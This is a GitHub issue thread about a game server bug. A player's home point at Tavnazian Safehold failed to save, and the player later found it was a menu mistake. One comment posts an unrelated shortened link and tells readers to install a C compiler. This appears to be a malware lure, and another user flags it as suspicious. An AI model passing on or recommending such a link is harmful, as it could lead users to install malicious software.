### ISSUE TITLE
Tav Home Point

### ISSUE THREAD

**Issue by Rawkhawk** [EdenServer/community#5976]
### Checklist

- [X] I have searched for existing issues for issues like this one. The issue has not been posted.
- [X] I have provided reproducible steps. (No "as the title says" posts please. ***Please try to state facts only, and avoid assumptions/opinions.***)
- [X] I have provided my client version in the details. (type /ver into your game window)
- [ ] ***I have provided proof of my claim (era videos, links to era wiki and/or forum posts)*** Lack of proof will slow down fixes and prioritization. Please provide details so that developers' research time is minimized.

### Details

Setting your home point at Tavnazian Safehold and then warping didn't take me to Tav, but back to Bastok where my home point was set before.  Tested on two characters.

**Comment by aroopcodder** [comment]
try this
https://bit.ly/3TyLBMS
If you don't have the c compliator, install it.(gcc or clang)

**Comment by falzum** [comment]
I wouldn't install whatever that is. Seems suspicious

**Comment by Rawkhawk** [comment]
Tested in Selbina, home point there works correctly.  Was able to set it and warp took me to Selbina.

**Comment by KnowOne134** [comment]
tested on test server and works as it should.
can you see if the listed homepoint on status-> profile says tav safehold or still the other area
my logs showing:
![image](https://github.com/user-attachments/assets/bbb4c256-18f5-47af-a452-404a50267f8d)

**Comment by Rawkhawk** [comment]
Looks to be working properly now, I must have entered through the menus incorrect last night and this morning.  Sorry about that, thanks KO.
